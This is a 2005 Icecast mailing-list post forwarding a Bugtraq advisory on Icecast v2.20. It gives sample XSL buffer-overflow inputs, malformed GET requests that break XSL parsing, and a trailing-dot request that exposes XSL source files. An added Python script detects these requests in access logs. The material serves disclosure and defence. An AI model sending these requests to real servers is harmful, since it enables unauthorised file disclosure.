[Icecast] [Fwd: IceCast up to v2.20 multiple vulnerabilities]

Stauf stauf at freshcheese.net
Sat Mar 19 08:24:59 UTC 2005

Hey all,
did you happen to see this recent post to bugtraq?  If so, I apologize.
 I haven't been keeping up with the archives since everything has been
running so smoothly. ;)
--Stauf

-------- Original Message --------
Subject: IceCast up to v2.20 multiple vulnerabilities
Date: 18 Mar 2005 22:31:14 -0000
From: Patrick <patrickthomassen at gmail.com>
To: bugtraq at securityfocus.com

These are tested on IceCast v2.20. This software can be freely obtained
from http://www.icecast.org.

"Icecast is a streaming media server which currently supports Ogg
Vorbis and MP3 audio streams. It can be used to create an Internet
radio station or a privately running jukebox and many things in
between. It is very versatile in that new formats can be added
relatively easily and supports open standards for communication and

1) The XSL parser has some unchecked buffers (local), but they don't seem
to be exploitable. If they are, they can be used for privilege
escalation, under the user that the server runs.

<xsl:when test="<lots of chars>"></xsl:when>
<xsl:if test="<lots of chars>"></xsl:if>
<xsl:value-of select="<lots of chars>" />

2) Cause XSL parser error "Could not parse XSLT file". (Not very useful).

GET /status.xsl> HTTP/1.0
GET /status.xsl< HTTP/1.0
GET /<status.xsl HTTP/1.0

3) XSL parser bypass. (Useful to steal customized XSL files, lol).

GET /auth.xsl. HTTP/1.0
GET /status.xsl. HTTP/1.0

--

| " Yesterday upon the stair I met a man who wasn't there.
|   He wasn't there again today. I wish that man would go away."
|                   <[Hughes Mearns]>
| Latest Public Key: http://www.freshcheese.net/~stauf/stauf.gpg
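
An added example, not part of the forwarded advisory or of Icecast itself: a log check that flags the request shapes listed in items 2 and 3 above. It assumes the access log uses the Apache common/combined layout, also decodes percent-encoded forms (a generalization beyond the literal requests shown), and runs on constructed sample lines.

```python
import re
from urllib.parse import unquote

# Assumption: request line is the first quoted field, as in Apache-style logs.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')

def classify(target):
    """Label a request target that matches item 2 or item 3, else None."""
    path = unquote(target.split("?", 1)[0])   # drop query, decode %xx
    name = path.rsplit("/", 1)[-1].lower()    # last path segment
    if ".xsl" not in name:
        return None
    if "<" in name or ">" in name:
        return "xsl-parse-error"              # item 2: /status.xsl>, /<status.xsl
    stripped = name.rstrip(".")
    if stripped != name and stripped.endswith(".xsl"):
        return "xsl-parser-bypass"            # item 3: /status.xsl.
    return None

def scan(lines):
    """Return (line number, client, label, raw target) for each flagged line."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        label = classify(m.group("target"))
        if label:
            client = line.split(" ", 1)[0]
            hits.append((lineno, client, label, m.group("target")))
    return hits

# Constructed sample log lines (documentation addresses, made-up sizes).
SAMPLE = [
    '192.0.2.10 - - [19/Mar/2005:08:00:01 +0000] "GET /status.xsl HTTP/1.0" 200 2310',
    '198.51.100.7 - - [19/Mar/2005:08:00:05 +0000] "GET /status.xsl. HTTP/1.0" 200 1804',
    '198.51.100.7 - - [19/Mar/2005:08:00:06 +0000] "GET /auth.xsl%2e HTTP/1.0" 200 950',
    '198.51.100.7 - - [19/Mar/2005:08:00:07 +0000] "GET /status.xsl> HTTP/1.0" 200 40',
    '198.51.100.7 - - [19/Mar/2005:08:00:08 +0000] "GET /%3Cstatus.xsl HTTP/1.0" 200 40',
    '192.0.2.10 - - [19/Mar/2005:08:00:09 +0000] "GET /stream.ogg HTTP/1.0" 200 88211',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit)
```
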

